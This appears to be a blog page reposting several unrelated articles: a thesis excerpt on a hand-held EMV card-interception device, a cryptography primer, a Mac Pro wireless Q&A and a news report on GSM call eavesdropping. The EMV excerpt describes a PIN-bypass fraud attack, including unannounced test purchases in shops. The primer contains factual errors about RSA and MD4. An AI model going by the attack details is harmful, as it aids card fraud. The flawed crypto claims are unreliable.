Another goal of this project was to build a device that is small enough to hold it in a hand like you hold a mobile phone, and cheap enough for many users to actually afford. The motivation for this was to prove that a miniature device, able to perform man-in-the-middle EMV operations such as protecting users against fraud can be built.

After first creating a prototype board to prove the correctness of my design, I managed

image 1.1 The Smart Card Detective

to create a hand-held device that provides a trusted display for a transaction and allows users to defend against relay attacks. In Image 1.1 you can see an image of the final device.

A recently discovered vulnerability allows the use of any card (possibly stolen) without knowing its PIN. The French press has published news about the attack but they reported the scenario as being hard to execute in practice because it required specialized and complex hardware.

I have managed to implement this attack on the SCD quite easily as I already had a robust framework in place which made the implementation straightforward. This proves that a small and cheap device is able to tamper with a complex system such as EMV, but also suggests that technically competent criminals may have already developed their own devices.

The results of experiments using multiple cards and readers as well as some interesting findings are presented.

SCD overview

In this chapter I present the Smart Card Detective, giving an overview of the components involved, its functionality and the applications implemented so far. Details about the implementation, the challenges encountered, and the decisions made, are described in the next chapter.

1. Hand-held device 

An illustration of the SCD with the main components highlighted is shown in image 1.2.

image 1.2. Image of the SCD, component side (a) and user interface side (b)

The user interface is composed of an LCD with 16 characters divided in two rows, 4 push-buttons, 4 low-power LEDs, and a power switch. The LCD can be placed in two positions, differing by a 180 degrees rotation such that the LCD screen can be read in different orientations of the SCD.

There are several power sources, which can be selected using the power switch in con-junction with an external power jumper. When the power switch is in the BATTERY position the SCD runs on battery power. When the switch is in the EXTERNAL position the power source is determined by the jumper and is expected to be 5V. The available sources then are: TERMINAL, which means that the SCD will be powered by the terminal; USB, where power is given via the USB interface; and EXT, where power can be given by an external source. The power switch also has a 3rd position in which no power is selected and thus the SCD in turned off.

Programming and debugging can be done using the JTAG interface. Additionally the SCD can be programmed via the USB interface using the In-System Programming facility which allows application code stored in the flash memory to write data into another part of the flash. The USB interface can also be used to connect the SCD to a computer and transfer data using the USB controller available on the SCD.

image 1.3 Smartcard Interface PCB

The user smartcard is inserted into the card slot (user interface side), and the SCD is connected to the terminal using a smartcard interface. For the smartcard interface I have designed a special Printed Circuit Board (PCB) having the same dimensions as a bank smartcard, which assures a reliable connection between the terminal and the SCD (see image1.3).

A normal usage scenario is as follows: first the user inserts the smartcard in the SCD, then switches on the device and selects the desired application. At this point the user insertsthe PCB card interface into the terminal and proceeds with the selected application. The applications are presented below.

2. Applications
There are currently five applications implemented: Forward Commands, Store PIN, Modify PIN, Filter Amount and No PIN.

The applications are selected from the boot menu. In order to access the boot menu the button BB must be pressed while resetting the device (pressing the RST button on the component side). Once the boot menu is accessed, the user can press BC to scroll through the list of applications and then select the desired application by pressing BD.

Forward Commands shows live information about the transaction on the LCD and logs the commands and responses without modifying or blocking the transaction. The log is stored in the EEPROM of the device and can be retrieved via any programming interface. The log mechanism can be used with all the applications presented below.

The Store PIN application as its name suggests is used to store a PIN into the EEPROM memory. This PIN is used by the Modify PIN application to modify the PIN that is transmitted in a transaction. In this way the user can make any transaction without ever typing the real PIN. To store the PIN I currently extract the necessary information from the VERIFY command. As a result the keypad of a terminal (including CAP readers) can be used to type the desired stored PIN. 


Filter Amount represents the main goal of this project. This application eavesdrops on the communication between the card and the terminal until the terminal sends a Generate AC command. At this point the SCD blocks the communication and shows the requested amount to the user. The user can check the transaction amount by scrolling through the menu displayed pressing BC. Then pressing BA will allow the transaction
to continue while pressing BD will terminate the transaction and restart the SCD.

Finally, the No PIN application is the implementation of the attack discovered recently by Steven Murdoch. Using this application the user can make a Chip and PIN transaction without knowing the PIN of a card even though the transaction receipt will read PIN VERIFIED.

Details about the design and implementation of the SCD are presented in the next chapter.
An evaluation and analysis of the applications implemented as well as results from real
tests are presented in Next capter.

Evaluation
With the hardware and software in place it was time to perform an evaluation of the SCD, in terms of hardware, software, and functionality. The results and observations are presented below.

Most of the tests have contributed to progressively improve the device in terms of performance and functionality. During the laboratory experiments I used the three analysis tools presented earlier: the .NET debugger to trace commands and responses as seen by the terminal emulator, the AVR dragon to check the state of the microcontroller (in terms of memory, execution path and I/O levels), and the oscilloscope to trace the signals from card and terminal (amplitude, frequency, bit duration).


1. Basic functionality
One of the first things to test was the correct functionality of the peripherals: the LCD, buttons and LEDs. This was done in a method (TestHardware) that performs simple I/O operations.

The next step was to verify the correct transmission of bytes between the terminal and SCD. This was done first by means of the terminal emulator as I could create my own test case and verify the results. Initially I verified that the ATR is correctly sent by the SCD, and then I checked that sequences of commands are correctly received and responded to. After that I created a reliability test case, where I wanted to verify the correct transmission of a large number of bytes. For this scope I created a loop transaction flow using the terminal emulator. A similar loop was used in the SCD. The SCD successfully exchanged data uninterrupted for 30 min (approximately 10 MB of data at a terminal frequency of 4 MHz, considering data is sent half of the time) before I ended the test. Similar tests have been done to check the correct communication between the SCD and card.

Once the SCD proved to work with the terminal emulator, I started the tests with CAP readers, which provide a real test scenario. I have used three different CAP readers, from Vasco, Natwest and Barclays. They execute a real transaction flow and have different working characteristics. The Vasco reader operates at 1 MHz, while the Natwest and Barclays readers run at 1.5 MHz. Also the Vasco reader starts a transaction but stops the power and clock soon after receiving the ATR. The transaction is then restarted when
the user selects the desired application. The Natwest reader keeps the power and clock from the moment the card is inserted until the transaction is over. Finally the Barclays reader behaves similarly to the Vasco reader but sends an initial short restart signal before actually starting operation. The diversity of operation provided by these three readers provided a good input to improve the SCD functionality. The evaluation of the complete SCD functionality including tests on CAP readers is discussed in section 3.


2. Power consumption
The main objective of the SCD was to be used as a hand-held device in real payment scenarios. Thus power consumption is a critical factor as the battery may be exhausted very quickly if good power management is not in place.

Using a variable power supply I tested the SCD operation with different voltage and current intensity. I found several factors that make a big difference in the overall power consumption, as presented below.

First of all, it is important the way in which the I/O line is set up for reception mode. The pull-up resistor of the I/O pin (PB6 for the card) should be enabled instead of driving the line high. When the line is driven high the power consumption of the ICC is much higher (with spikes of about 30 mA difference) than when using the pull-up resistor. I have noticed an important difference by changing the sequence of the following instructions,
which set the card I/O line to reception mode (state Z) :

• Good way :
                                         DDRB &= ˜( BV(PB6 ) ) ;
                                         PORTB |= BV(PB6 ) ;
• Bad way :
                                         PORTB |= BV(PB6 ) ;
                                         DDRB &= ˜( BV(PB6 ) ) ;

There are six I/O ports (labeled A through F) available in the AT90USB1287. Most of the ports have 8 pins. The direction (input or output) of each pin is controlled by

table 1. Port pin configurations for AT90USB1287. Extracted from datahseet

the DDRx registers (where bit 3 of DDRB controls the pin PB3 of port B), while the PORTx registers control the voltage on that pin (high or low). The possible states for each port are shown in table 1.

Back to setting the I/O line correctly, what happens in the first case is that initially PB6 is set as input with no pull-up (assuming PORTB6 was 0), and then PORTB6 is set to 1 which enables the pull-up. This sequence will cause the voltage on the I/O line to gradually increase from 0 to approximately 3.78 V which is given by the pull-ups of the AT90USB1287 and ICC. In the second case, the I/O line is first set to high and then
DDRB6 is set to 0, changing the pin direction to input which enables the pull-up resistor. In this case the voltage on the I/O line spikes to around 5 V and then decreases slowly to the value of 3.78.

I also noticed that the ICC does not drive the I/O line correctly (after testing with several cards). When the ICC transmits a ZERO bit to the SCD, it pulls the line low (ground) correctly. However, when the card transmits a ONE bit, it first uses the pull-up resistor to rise the voltage to around 4 V and then immediately switches the port to high impedance such that the voltage drops to around 1.5 V. Thus, if the SCD uses the high impedance mode on the I/O line as well, the communication ends. So the terminal (and implicitly the SCD) must enable the pull-up resistor on the I/O line even when it is receiving a byte from the ICC. Such functionality does not respect the EMV standard which states that the voltage used by the card for a transmitted bit ONE should be [3.5, 5] V for VCC = 5V.

Another important power consumer is the LCD. The model I use (EVERBOUQUET MC0802A-SGR) consumes between 10-30 mA during operation. There are other LCDs with lower power consumption, but this was chosen based on its low cost (£5). In this situation is very important to use the LCD only when needed. After many experiments I realized that the best method to reduce the LCD power consumption is to delay sending any commands to the LCD until the last possible moment. Although the HD4778 controller (available in the MC0802A LCD) provides commands for turning the LCD on and off, these do not change the power consumption. In fact, sending a power off command (with or without prior initialization) to the LCD will increase the power consumption. Resetting the SCD after using the LCD seems to be the best solution to keep a low power consumption. This will restart the LCD controller, which will not start running (and thus will not consume power) until a first command is sent.

With all the improvements in place, the total consumption of the SCD (including LCD
and card operation) is around 40 mA.

Image 4. Battery discharge for a CR2430 cell battery under low current consumption

(less than 2 mA) (a), and estimated discharge for two CR2430 batteries under higher

consumption (average of 30 mA)

The battery discharge in time for one of the 3V CR2430 cell batteries is shown in figure 6.1(a). As it can be seen, this type of batteries are designed for a load of at least 2.5 K Ω (i.e. less than 2 mA at 5V). In full operation the SCD consumes up to 40 mA, while in sleep mode it consumes less than 20 mA. Considering an average consumption of about 30 mA, and based on several measurements of the battery voltage during operation, I approximated the discharge of two CR2430 batteries under continuous use of the SCD as shown in figure 6.1(b) (the green area represents the time during which the two batteries provide enough voltage for correct operation of the SCD).

3. Functionality tests
After checking (and fixing problems as necessary) the basic functionality and performance of the SCD, I went on to verify the applications described. 

The first series of tests have been done on CAP readers, as they perform a transaction with all the necessary steps for testing my applications, including PIN verification (VERIFY command) and amount authorization request (GENERATE AC command).

Tabel 2. Log of CAP transaction

The SCD successfully executes all applications (Forward Commands, Modify PIN, Filter Amount, and No PIN) on the Vasco and Natwest CAP readers (see Tabel 2). Using the log functionality with the Forward Commands application I captured the information of a CAP-Identify transaction, where the user enters the PIN and gets a secure code for online authentication. This transaction is shown in table 6.2, where non-essential information that could be used for identification has been marked with X or omitted. The
transaction flow is the same for the Modify PIN and No PIN applications, while for Filter Amount the transaction might end after the VERIFY command if the user does not accept to continue.

Based on the log from the CAP transaction, I observed two important differences from the standard EMV specification. Firstly, the CAP application does not use the traditional SELECT 1PAY.SYS.DDF01 command to start the transaction, but the selection by Application Identifier (AID). As can be seen from the log, the CAP reader issues multiple SELECT commands (with different AIDs) before finding the correct CAP application on the card (AID = A0000000048002 in this case). This suggests that the CAP reader has
several applications installed, possibly for different cards. Secondly, after using the AID selection, the CAP reader does not issue a final SELECT command before continuing with the transaction, as it is specified in the EMV standard. 

The final test consisted in verifying the correct operation of the SCD with a real terminal,
completing an online transaction. For this purposes I have asked permission to use the

Image 5. Forward Commands application tested on Natwest CAP reader. The SCD

has blocked the transaction after the PIN has been entered and is waiting for the user to

select if the transaction should continue (yes) or not (no)

SCD at the cafeteria in our department. After a few failed attempts, the SCD has successfully executed the Filter Amount and No PIN applications. The unsuccessful attempts were caused by an incorrect implementation of TLV object decoding. Using the logs from the failed attempts I was able to replicate the live transaction on the terminal emulator and thus find and correct the issue.

I was expecting the Filter Amount application to work correctly since I tested the functionality on CAP readers and terminal emulator. However I was surprised to see that the No PIN application succeeded, which shows the vulnerability has not been fixed yet. Recently, a journalist from TAC Presse (France) has come to our department to make a reportage about the vulnerabilities of Chip and PIN cards.

First Steven Murdoch has helped us in setting up the relay attack, where a fake terminal shows a transaction for £5.00 but actually requests a payment authorization for £123.45. Using the SCD between a real card and the fake terminal we were able to see the correct amount (£123.45) on the display and cancel the transaction (see Image 6).

 

Image 6. SCD operating as trusted display in a relay attack scenario: demonstration
system (a), close up on fake terminal and SCD displays (b). Images offered by Steven
Murdoch

Then we have used the SCD to perform the No PIN attack at the local cafeteria and even in some random shops in Cambridge. We have successfully bought books and DVDs worth over £50 at one of the shops using the journalist’s card but typing PIN 0000. Even more, we have performed the tests without warning and nobody has noticed the hidden device or fake card (the card interface connected to the SCD). After the transaction we have disclosed the attack to the shop manager who said that such attacks occur very often.
The manager mentioned that during busy periods like Christmas credit card frauds occur at least once a week. Because shops cannot longer check the cards (as the current policy is to let the customer handle the card insertion and removal) the criminals can use fake cards and devices similar to the SCD to perform fraud.

Original Post : The Smart Card Detective (SCD)

Baca Selengkapnya... Smart Card Detective (SCD)

Crypto Primer: Understanding encryption, public/private key, signatures and certificates

by Plankytronixx

So much of what I will write on this blog will assume a knowledge of crypto. I thought I’d create a post I could reference back to for many future posts to keep things simple and easy to understand.

Algorithms and keys

We all know what an algorithm is. In cryptography it’s not the algorithm you keep secret. The algorithm should be designed in such a way that if it is discovered, unless the snooper has the key, it is useless to him/her. Many algorithms are publicly published. Key secrecy is what’s important. It even goes as far as to say that if you know the algorithm, in other words, you know what mathematics was used and you also know the ciphertext itself, a good encryption algorithm will still keep the plaintext data secret! It sounds impossible because if somebody told me “the answer is 27 and I know to get that number the algorithm divided by 10, added 4 then multiplied by 3”, I’d be able to pretty quickly calculate the input was 50. But these algorithms use special one-way functions (which we’ll look at in a moment) which make that impossible (or at least so difficult you’d never bother to attempt it) to do.

There are 2 broad classes of algorithm – symmetric and asymmetric. Symmetric algorithms use the same key for both encryption and decryption. Asymmetric algorithms, such as public/private key cryptography use one key for encryption and a different, though mathematically related key for decryption. That last sentence sounds counter-intuitive. As does the idea that publishing your algorithm still maintains secrecy. But that’s the truth. Of course an algorithm is only secure until/if somebody finds a weakness.

There is a scenario known as the doomsday scenario. This is the day somebody publishes an algorithm for predicting prime numbers. Almost the entirety of public/private key cryptography (used by protocols such as SSL/TLS) is based on the notion that there is no pattern to a series of prime numbers, other than that they are prime.

There is a possibility that somebody has already come up with a prime-prediction algorithm. It would certainly be in their interest to keep it secret!

The encryption algorithm has 2 inputs – plaintext and the key. It has one output, ciphertext.

If decrypting data, 2 inputs: ciphertext and the key. It has one output, plaintext. 

One Way Functions

Mathematical functions where it is difficult (or impossible) to get back to the source values, knowing only the output values, are known as one-way functions. There are many, but modular arithmetic gives us a method that is used extensively in cryptography. 

A simple example is where, on a 12 hour clock face, you add 5 hours to 9am. The answer is 2 pm. Or written down we could say:

9+5=2

 

Because this is an example of modular arithmetic where the modulus is 12, we’d actually write:

9+5=2(mod12)

Let’s take a simple function: 

3^x where x=2

This is a function for turning 2 in to 9, because  it’s the same as 3 * 3, which equals 9. There is a direct relationship between the magnitude of x and the magnitude of the function result. Using modular arithmetic can give the function a great property – unpredictability.

x	1	2	3	4	5	6
3x	3	9	27	81	243	729
3x(mod7)	3	2	6	4	5	1

Your password in Windows is stored as a one way function – albeit one that is considerably more complex than what you’ve just seen.

Hashes

There are some very useful algorithms that produce fixed length strings. For example it doesn’t matter how much data you feed in to an MD4 hashing algorithm, you’ll always get a 128 bit string out of it. That means there must be rather a lot of input strings that will produce exactly the same output strings – and indeed there are; they’re called collisions;  they are so rare, you might as well consider them to never happen, in just the same way you are very unlikely to ever have 2 GUIDs of the same value if the programming framework you use has true randomness and a uses big enough numbers for GUIDs. MD4 is a complicated one-way function, so predicting collisions is, to all intents and purposes, impossible. Unless you keep trying and comparing the output strings. This is, in theory the only way to find out. It’s called a brute force attack. You just use computing power to very quickly run through all possible combinations. This could take a long time. A very long time. Hashes are very useful because they allow you to perform comparisons very quickly. If you have a large message, you can create an MD4 hash of the message and send the hash to somebody over a slow network. They can then run a hash on data they hold, which they believe to be identical and compare the hash you sent them, with the one they just generated. If they are the same, it means the 2 datasets are the same.

So say if I take the string “1” and put it through hashing functions – I’ll end up with:

MD4: 8BE1EC697B14AD3A53B371436120641D

MD5: C4CA4238A0B923820DCC509A6F75849B

However, if I take the string “2”, which is numerically almost identical to the first string – I’ll get massively different results.

MD4: 2687049D90DA05D5C9D9AEBED9CDE2A8

MD5: C81E728D9D4C2F636F067F89CC14862C

All this stuff comes in very useful with digital signatures which I’ll describe a little later.

Key Distribution

The problem with encrypting/decrypting data in the way I’ve told you so far, is that you have to somehow get the decryption key safely to your partner. It could easily be intercepted in this day of us all being permanently online. It’s the age-old problem that generals have had of communicating with their officers in the field for centuries. If the messenger who has the key is captured, all your communication can be decrypted, whether or not subsequent messengers know the key. This is called the key distribution problem.

 

3 mathematicians came up with an answer to this problem: Diffie, Hellman and Merkle. They do an exchange of data which can be intercepted by anybody but which allows both sender and receiver to generate the same key but doesn’t allow the interceptor to generate the key. Sounds incredible? It’s very simple to explain, now that you understand modular arithmetic.

 

Follow the steps 1 through 4. In the last step both Alice and Bob have the same key: 9. From this point on they can use 9 as their encryption and decryption key. All I can tell you is that it works. Why it works I have no idea – I am very poorly educated! However, I’m happy to live with the fact that it just works.  If it’s beyond you, you’re not alone. Maybe you are also poorly educated! I do think it’s really clever, neat and cool though.

Asymmetric Key Encryption

We use one key to encrypt, and a related key to decrypt data. You can actually swop the keys round. But the point is you don’t have one key. This gets round the key distribution problem. There’s a great way of describing the difference between symmetric and asymmetric key encryption. It involves the use of a box to put messages in and we have to assume the box, its clasps and the padlock used to lock it are impossible to penetrate.

Symmetric Key: You send a messenger out with a copy of the key. He gets it to your recipient who lives 10 miles away. On the way he stops at a pub and has his pocket picked. The key is whisked off to a locksmith who copies it and it is then secreted back in to the messenger’s pocket.

Some time later you send a messenger with the box containing your message. You are confident that your recipient is the only one who can read the message because the original messenger returned and reported nothing unusual about the key. The second messenger stops at the same pub. He is pick-pocketed. The copy key is used to unlock the box and read the message. The box with its message intact is secreted back in to the messenger’s pocket. You and your recipient have no idea that your communication has been compromised. There is no secrecy…

Asymmetric Key: Your recipient has a padlock and key. He keeps the key in a private place about his person. Let’s therefore call it a private key. He puts the padlock in to the box, but leaves it unlocked. He doesn’t mind if anybody sees the padlock. It’s publicly viewable. Even though it’s not really a key, let’s call it a public key. He sends a messenger to you with the box. The messenger stops at the pub and is pick pocketed. All the snoopers see is an open padlock. They secretly return the box. The messenger arrives at your door. You take the padlock out of the box and put your message in to it. You use the open padlock to lock the box, snapping it shut and you send the messenger on his way. He again stops at the pub and is pick-pocketed. They find only a padlocked box. No key. They have no way of getting in to the box. They secretly return the box to the messenger’s pocket. The messenger gets to your recipient, who use the key he secreted  in a private place about his person (the private key) and uses it to unlock the padlock and read the message. Secrecy is maintained.

You can see the process is a bit more complicated for asymmetric key than for symmetric key, so it’s not something you’d want to do often. So what is often done is that instead of putting a message in the box and padlocking it, a symmetric key is put in the box and padlocked. That way, you solve the key distribution problem. That’s what happens with computer cryptography mostly. Public/private key cryptography is used to transport a symmetric key that is used for message exchanges. One reason for doing this is that asymmetric key crypto, or public/private key crypto, as it is known, is expensive, in terms of computing power, whereas symmetric key crypto is much more lightweight. When you see that a web site uses 256 bit encryption, they are talking about the symmetric key that is used  after the public/private key crypto was used to transport the symmetric key from sender to receiver. Often the key lengths for public/private key cryptography is 2048 bits. You may have found yourself confused when setting up IIS with 256 bit SSL encryption and seeing keys of 1024 or 2048 bits. This is why – it’s the difference between what’s called the session key and the public/private keys.

 

Although the diagram above explains how 2 keys are used, where does all this public and private key malarkey come in to play?

Let’s take the example of an ecommerce web server that wants to provide SSL support so you can send your credit card details securely over the Internet. Look at the public and private keys in the following diagram.

The public and private keys are held on the ecommerce web server. The private key is heavily protected in the keystore. Many organisations will go as far as to have a special tamper-proof hardware device to protect their private keys. The public key doesn’t need to be protected because it’s, well, public. You could have daily printouts of it in the newspapers and have it broadcast every hour, on the hour, on the radio. The idea is that it doesn’t matter who sees it.

The website generates the public and private keys. They have to be generated as a key-pair because they are mathematically related to each other. You retrieve the public key from the website and use it as your encryption key. You’re not just going to send your credit card information across the Internet yet. You’re actually going to generate a symmetric key and that is going to become the plain-text input data to the asymmetric encryption algorithm. The cipher-text will traverse the Internet and the ecommerce site will now use its private key to decrypt the data. The resulting output plain-text will be the symmetric key you sent. Now that both you and the ecommerce site have a symmetric key that was transported secretly, you can encrypt all the data you exchange. This is what happens with a URL that starts https://.

There are still a couple of problems to solve here, but let’s put them on to the back-burner for a little while. We need to understand digital signatures and certificates for those problems. In the meantime let’s have a peek at the mathematics inside the public/private key algorithm. There is an interesting little story-ette around this algorithm. A researcher at the UK’s GCHQ called Clifford Cocks invented the algorithm in 1973. However, working for GCHQ, his work was secret, so he couldn’t tell anybody. About 3 years later, 3 mathematicians, Ron Rivest, Adi Shamir and Leonard Adelman also invented it. They went on to create the security company RSA (which stands for Rivest, Shamir and Adelman). It is said the RSA algorithm is the most widely used piece of software in the world.

First, we’ll generate the public key. We pick 2 random giant prime numbers. In this case, I’ll pick 2 small primes to keep it simple; 17 and 11. We multiply them to get 187. We then pick another prime; 7. That’s our public key – 2 numbers. Pretty simple.

Now we use the public key to generate the private key. We run it through the algorithm in the diagram above. You can see we use modular arithmetic. Obviously the numbers would be massive in real life. But here, we end up with a private key of 23. The function, 7 * d = 1(mod 160) has that look of simplicity, but it’s not like that at all. With large numbers we’d need to use the Extended Euclidean Algorithm. I have to say, my eyes glazed over and I was found staring in to the distance when I read this about it:

The extended Euclidean algorithm is particularly useful when a and b are coprime, since x is the modular multiplicative inverse of a modulo b.

Now we want to use that to encrypt a message.

To keep things simple, we’ll send a single character; “X”. ASCII for X is 88. As we are the sender, we only know the public key’s 2 values: 187 and 7, or N and e. Running 88 through the simple algorithm gives us the value 11. We send the ciphertext value 11 to the ecommerce web server.

The Web server has access to the private key, so it can decrypt the ciphertext.

The web server passes the plaintext through the algorithm shown above and gets us the original “X” that was sent. The bit that says :

Plaintext = 11²³(mod 187)

OK – there’s actually a problem here. In this message, every “X” would come out in ciphertext as the value 11. We could perform a frequency analysis attack on the message. In the English language, certain letters tend to appear more frequently than others. The letters “e” and “i” for example are very common, but “x” and “z” are uncommon.

There is a “signature” that could be used to find the content of a message. We therefore need to encrypt much larger blocks of data than just one byte at a time.

Digital Signatures

Asymmetric keys, as mentioned earlier can be swopped around. If you use one key for encryption, you must use the other key for decryption. This feature comes in very handy for the creation of digital signatures. You’ve heard of digitally signed documents, authenticode, digitally signed applications, digital certificates and so on.

In the diagram you can see all we’ve done is combined some plaintext in to the same “message” as its equivalent ciphertext. When it’s time to check a digital signature, we reverse the process :

To check a message, we decrypt the encrypted portion, and get back plain text. We then compare that to the plain text in the message. If the 2 sets of plain text are different, it means either:

• The plaintext in the message has been altered and that accounts for the difference.
• The ciphertext in the message has been altered and that accounts for the difference.
• They have both been altered and that accounts for the difference.

In order to have a consistent message, the attacker would need to have access to the key that was used to generate the ciphertext.

Do you remember earlier, I talked about hashes? Well, because a message might be quite large, it’s often best to generate a hash of the message and encrypt that. If it’s an MD5 hash, it means you’ll only have to encrypt 128 bytes. When you come to perform the validation of the signature, you have to take the plain text portion and generate a hash before you do the comparison. It just uses the CPU more efficiently.

In this case, the message consists of a small section of ciphertext because the string-size of the input plaintext was reduced through hashing before it was encrypted. It also includes the plaintext of the message.

Depending on the data you are looking at, you’ll often even find the keys you can use to decrypt the message in plaintext within the message body. It seems like complete madness because anybody who intercepts the message could simply modify the plaintext portion of the message and then use the included key to generate a new ciphertext equivalent. That would make the message consistent.

However, if the plaintext key included in the message is the message-issuer’s public key, then the attacker would need access to the corresponding private key, which they won’t get because it’s, well, private.

But even with this there is still a problem. How do you know the message came from the sender it purports to come from? As an attacker, I could easily generate my own key-pair. I could then create a message that says I am the issuer and use my private key to create the encrypted part of the message.

When you come to check the message you’ll know that it definitely wasn’t tampered with in transit, but how do you know you can trust the public key embedded in to the message? How do you know that it’s me that created the message. That’s where digital certificates come in to play.

Certificates

Certificates are data structures that conform to a specification: X.509. But really they are just documents that do what we just talked about. The plain text data is the public key, plus other distinguishing information like the issuer, the subject name, common name and so on. It is then hashed and the hash is encrypted using the private key of a special service called a certification authority (CA) – a service that issues certificates.

When we protect a web server with an SSL certificate, we go through a 2 stage process. generating a certificate request, and then finishing it off by receiving and installing the certificate. The request part, generates a public and private key. The public key plus the distinguishing information is sent to the CA, which then creates a digitally signed document, signed using the CA’s private key. The document conforms to X.509 certificate standards. The certificate is returned by the CA, and we install it on our web server.

Anytime anybody connects to the web server over SSL, they retrieve the certificate and perform a signature validation on it. Remember it was signed by the CA’s private key. So they have to have the CA’s public key to perform the validation. If you go in to Internet Explorer’s Internet Options and then to the Content tab, you’ll se a Certificates button. That shows you all the CAs you have certificates (and therefore public keys) for. It means if you see a certificate that was signed by a CA on a web site, in theory, the CA did a check to make sure the requester was indeed the requester before issuing the certificate. It means that you have to trust that the CA did a good job of checking the requester’s validity before issuing the certificate.

Even this creates a minor problemette – how do you know the CA’s certificate wasn’t created by an imposter of some description? Well, it can have its certificate signed by a CA higher up the food-chain than itself. Eventually you get to a CA at the top of the food chain and this is called a Root CA. Internet Explorer and all the other browsers have all the main Root CAs for the Internet built-in. These are trusted organisations. They have to be! They are so trusted, they are able to sign their own certificates.

Technorati Tags: crypto primer,crypto,cryptography primer,cryptography,encryption,decryption,asymmetric key,symmetric key,public/private key,public key infrastructure,pki,certificates,digital signatures,signatures,signing,digital certificates,x.509 certificates,planky,plankytronixx

You may from time to time play with a Visual Studio command line tool called makecert.exe. It’s a tool that creates self-signed certificates. If you are just using them for development purposes on a local machine they are probably fine. You trust yourself, presumably. Sometimes you can use self-signed certificates on Internet-facing services. For example if you upload your own self-signed certificate to a service and you are sure nobody intercepted it while you were uploading it (because you were using SSL maybe), it means you can have private conversations with the service and you can be sure the service is the service you issued the certificate to. If you just sent the naked certificate, they’d be able to encrypt messages that only you could decrypt, because you’d have the private key. It’s possible to also include the private key when you create a certificate. If you send one of these certificates to an Internet service, they can digitally sign messages they send to you with your private key. Because you are assured that you gave the private key only to the service, you can be sure the messages are genuinely coming from that service and not an imposter. You have to trust that the service do a good job of keeping your private key safe.

Of course it wouldn’t be practical if every time you wanted to buy something on the Internet, in order to create an SSL connection you had to first upload a self-signed certificate. That’s why there is a large infrastructure of CAs and Root CAs built on the Internet. This infrastrucutre is called a Public Key Infrastructure or PKI. Many organisations have their own internal PKIs.

Above: Internet Explorer’s list of Trusted Root CAs.

You can also see the chain of CAs up to that chain’s corresponding Root CA when you look at a certificate.

This shows an expired certificate that was issued to my BPOS (Office 365) account by the CA called “Microsoft Online Svcs BPOS EMEA CA1”. Its certificate was in turn issued by “Microsoft Services PCA” which had its certificate issued by “Microsoft Root Certificate Authority”. As it’s a Root CA, it appears in the Trusted Root CAs container in Internet Explorer. As you walk up the chain you have to eventually get to a point where you trust the certificate. If you don’t, you’ll get a certificate error warning and a lot of messages advising you not to continue.


I’ll write another post soon that goes through a complete SSL handshake. That's a great way to explain what’s happening in crypto.

Planky

Baca Selengkapnya... Crypto Primer: Understanding encryption, public/private key, signatures and certificates

How to Make a Mac Pro Wireless

by Susie Ochs

I currently have four computers (one Mac G4 and three PCs) wired to a Netgear wireless router. I recently acquired a Mac Pro. Where I want to keep and use the new computer will make running a new cable impractical. I’ve asked several Mac users how to make the computer wireless, but they all have different answers. How does one make a Mac Pro wireless?

Current Mac Pros come with AirPort Extreme 802.11n wireless, already equipped. (You can double-check that the AirPort card is present in your Mac Pro by opening the System Profiler application and clicking AirPort in the column on the left.) Check your menu bar for the AirPort logo (it’s shaped like a baseball diamond), and click it to turn AirPort on. The Mac will scan for wireless networks, and if your Netgear router is in range, you can select it, enter your network’s password, and you’ll be connected.

Mac Pros have four PCI Express slots for adding expansion cards

 like this AirPort Extreme card sold by Other World Computing.

While current Mac Pros have that AirPort Extreme card standard, some previous Mac Pro models didn’t. When the Mac Pro was introduced in 2006, it came with two Ethernet ports (for wired connectivity) but the AirPort Extreme card was an optional add-on. It didn’t become standard until 2010. But you can still add an AirPort Extreme card to a Mac Pro that didn’t come with one. We recommend picking it up from Other World Computing, which sells the Apple AirPort Extreme 802.11n Wireless Mini-PCIe Card ($89.99). It comes with installation instructions, and you won’t even need any tools since the Mac Pro is so easy to open. That card’s 802.11n speeds are the fastest available for your Mac Pro, and once it’s installed, you’ll be able to connect to your router wirelessly.

Baca Selengkapnya... How to Make a Mac Pro Wireless

Hackers crack open mobile network (GSM Sniffing)

Mobile calls and texts made on any GSM network can be eavesdropped upon using four cheap phones and open source software, say security researchers.

Karsten Nohl and Sylvain Munaut demonstrated their eavesdropping toolkit at the Chaos Computer Club Congress (CCC) in Berlin.

The work builds on earlier research that has found holes in many parts of the most widely used mobile technology.

The pair spent a year putting together the parts of the eavesdropping toolkit.

"Now there's a path from your telephone number to me finding you and listening to your calls," Mr Nohl told BBC News. "The whole way."

He said many of the pieces in the eavesdropping toolkit already existed thanks to work by other security researchers but there was one part the pair had to create themselves.

"The one piece that completed the chain was the ability to record data off the air," he said.

In a demonstration at the CCC, the pair took attendees through all the steps that led from locating a particular phone to seizing its unique ID, then leap-frogging from that to getting hold of data swapped between a handset and a base station as calls are made and texts sent.

Key to grabbing the data from the air were cheap Motorola phones which can have their onboard software swapped for an open source alternative.
 
"We used the cheap Motorola telephones because a description of their firmware leaked to the internet," he said.

This led to the creation of open source alternative firmware that, he said, has its "filters" removed so it could see all the data being broadcast by a base station.

This allows attackers to home in on the data they need to eavesdrop, said Mr Nohl. The encryption system that scrambles this data can be defeated using a huge list of encryption keys, called a rainbow table, that Mr Nohl generated in a separate research project.

"Any GSM call is fair game," he said.

GSM is the name of the technology used on the vast majority of mobile phone networks around the world. The GSMA, which represents operators and phone makers, estimates that there are more than five billion GSM mobiles in use around the world.

The GSMA has not responded to requests for comment about the research.

Playing around
Simeon Coney, a spokesman for mobile security firm Adaptive Mobile, said the work looked fairly thorough.

"Especially interesting is how the attack is aimed at a specific target phone, which could lead to malicious interest of high value targets," he added.

"This isn't an attack that is today readily repeatable yet by the anyone unfamiliar with the underlying technology," he said. "However, it does illustrate the manners in which the mobile phone system could be compromised in a focussed attack in less protected markets."

Mr. Nohl said that before now commercial equipment that could spy on calls cost upwards of £35,000. The kit demonstrated at the Berlin event cost far less than that, he said. For instance, the Motorola phones used to grab data cost only 10 euros (£9) each.

Despite showing off the entire eavesdropping kit, there were no plans to release all of it for others to use, said Mr. Nohl.

However, recreating the missing parts would not be difficult for a tech savvy amateur, he added.

"I expect people to do it for the fun of doing it."

Mr. Nohl said the motivation for carrying out the research was to create awareness around the problem and perhaps prompt operators to improve security.

A few simple steps could make it much harder for eavesdroppers, he said.

"Raising their awareness is the most likely outcome, but the technical changes would be better."

 This is sample simulation GSM Sniffing :
Download

Baca Selengkapnya... Hackers crack open mobile network (GSM Sniffing)

BotTorrent? Using BitTorrent as a DDoS Tool

